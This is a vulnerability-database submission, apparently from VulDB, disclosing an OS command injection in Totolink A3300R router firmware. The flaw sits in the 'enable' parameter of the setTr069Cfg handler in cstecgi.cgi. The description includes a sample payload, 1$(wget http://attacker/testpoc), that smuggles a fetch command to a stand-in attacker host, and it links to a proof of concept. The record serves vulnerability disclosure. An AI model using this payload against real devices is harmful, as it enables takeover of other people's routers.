| Title | Totolink A3300R V17.0.0cu.557_B20221024 OS Command Injection |
|---|
| Description | A command injection vulnerability exists in /cgi-bin/cstecgi.cgi for topicurl=setTr069Cfg. The enable parameter is passed to Uci_Set_Str, concatenated into shell command content, and executed by CsteSystem/execv without filtering shell metacharacters. Injected input like 1$(wget http://attacker/testpoc) leads to command execution. |
|---|
| Source | ⚠️ https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-enable-cmd-injection |
|---|
| User | Svigo_o (UID 95970) |
|---|
| Submission | 03/30/2026 04:55 (10 days ago) |
|---|
| Moderation | 04/06/2026 11:42 (7 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 250461 [Totolink A3300R 17.0.0cu.557_B20221024 setTr069Cfg pass command injection] |
|---|
| Points | 0 |
|---|